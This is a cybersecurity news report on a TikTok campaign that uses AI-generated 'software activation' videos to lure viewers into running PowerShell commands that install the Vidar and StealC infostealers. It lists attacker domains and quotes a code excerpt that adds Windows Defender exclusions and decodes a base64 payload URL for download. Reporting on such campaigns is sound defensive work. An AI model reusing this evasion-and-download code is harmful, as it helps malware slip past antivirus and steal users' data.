“`html
Cybercriminals have harnessed artificial intelligence to devise intricate social engineering assaults on TikTok, utilizing AI-made tutorial clips to disseminate harmful information-stealing malware that has already reached hundreds of thousands of users across the platform.
Threat actors are capitalizing on TikTok’s vast user base by generating believable AI-produced videos that pretend to be credible software tutorials, specifically aiming at users looking to unlock pirated applications.
These misleading videos guide unsuspecting viewers through what seems to be a routine software activation process, but instead mislead them into executing harmful PowerShell commands that silently install dangerous malware variants such as Vidar and StealC onto their devices.
The extent of this campaign is especially concerning, with security researchers noting that some of these malevolent videos have garnered nearly half a million views, indicating the potential for widespread compromise throughout TikTok’s global user base.
This attack marks a significant advancement in social engineering strategies, combining the compelling nature of AI-generated content with the trustworthy atmosphere of popular social media networks.
Unlike conventional malware distribution techniques that depend on email attachments or dubious downloads, this operation takes advantage of the inherent trust users place in video tutorials, rendering it extraordinarily difficult for average users to recognize the threat.
Censys analysts observed that the campaign’s infrastructure demonstrates an intricate operation employing multiple domains and IP addresses specifically crafted to evade detection and sustain persistence.
Further exploration by Censys researchers uncovered an extensive web of malicious infrastructure supporting this campaign, including domains such as amssh.co, allaivo.me, and winbox.ws, all hosted on a robust sourcing provider known as AS214196, promising “fast, secure, and anonymous virtual servers with no KYC requirements.”
This hosting arrangement enables cybercriminals to operate with minimal supervision, complicating takedown attempts significantly.
PowerShell-Based Infection Mechanism
The malware’s infection procedure relies on intricate PowerShell scripts that utilize various evasion and persistence strategies.
When victims execute the provided commands, the malware initiates a multi-phase payload delivery system designed to bypass Windows Defender and secure long-term system access.
.webp)
The core infection script showcases advanced obfuscation methods, employing base64 encoding to obscure malicious URLs and implementing retry protocols for reliable payload downloads.
A representative code excerpt from the campaign reveals the malware’s systematic approach:-
function Add-Exclusion { param([string]$Path) try { Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue } catch {} }
$downloadUrl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("YWxsYWl2by5tZS9jcnlwdGVkLmV4ZQ=="))This script first disables Windows Defender monitoring for particular directories before retrieving the main payload from decoded URLs.
The malware ensures persistence by creating concealed directories in system folders and embedding itself as a trusted Windows Update service, guaranteeing ongoing operation even after system restarts while maintaining a discreet profile to evade detection by security programs.
The post Hackers Drop Info-Stealing Malware On TikTok Users Device Using AI-Generated Videos appeared first on Cyber Security News.
“`